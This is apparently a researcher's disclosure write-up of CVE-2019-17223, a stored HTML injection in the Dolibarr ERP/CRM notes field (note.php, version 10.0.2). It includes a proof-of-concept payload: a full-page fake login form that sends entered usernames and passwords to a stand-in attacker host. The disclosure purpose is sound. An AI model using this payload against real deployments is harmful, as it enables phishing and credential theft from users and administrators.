CVE-2019–17223 — Stored HTML Injection | Dolibarr CRM/ERP

João Zietolie Ciconet
2 min readOct 6, 2019


Dolibarr ERP/CRM is a open source software for small and medium businesses, foundations or freelancers, it provides different features for enterprise resource planning and customer relationship management.

The latest version of Dolibarr provide a good mechanism of defense for script injections, but with some research in the platform I found a field that do not validate the input at all, leaving room for HTML code execution.


In user dashboard, has a field to save notes, the input is not validate at all, and I was able to inject HTML code, that is stored in the application. The main problem is that all the page can be customized by injections on note.php and simply accessed by the link:

In my PoC(Proof of Concept) I craft a simple WEB login page, this page is showed by accessing the link above by the user or by principally, and more critical, the admin of the application. A complete and similar login page of the real application could be done and stored, making a good and convincing phishing since the URL is trusted and part of the application. Also this can be used for other type of attacks like session hijacking or just “defacement” of this page.

Below the vulnerable field(note.php):

There, I injected my simple login page, attackers could inject their own malicious HTML code like this:

<div style=’position: absolute; left: 0px; top: 0px; width: 2000px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;’>Please login with valid credentials:<br></br><br>Please enter your credentials to see the content:</br><br><form name=’Login’ action=’http://attackerIP:port/'><table><tr><td>Username:</td><td><input type=’text’ name=’username’/></td></tr><tr><td>Password:</td><td><input type=’text’ name=’password’/></td></tr><tr><td colspan=2 align=center><input type=’submit’ value=’Login’/></td></tr></table></form></div>

Once injected, always that user visit their notes by the dashboard or by the link, the login page will be showed and the attacker can visualize the credentials on his own server:

This vulnerability affects the version 10.0.2 but other versions may also vulnerable.

For more: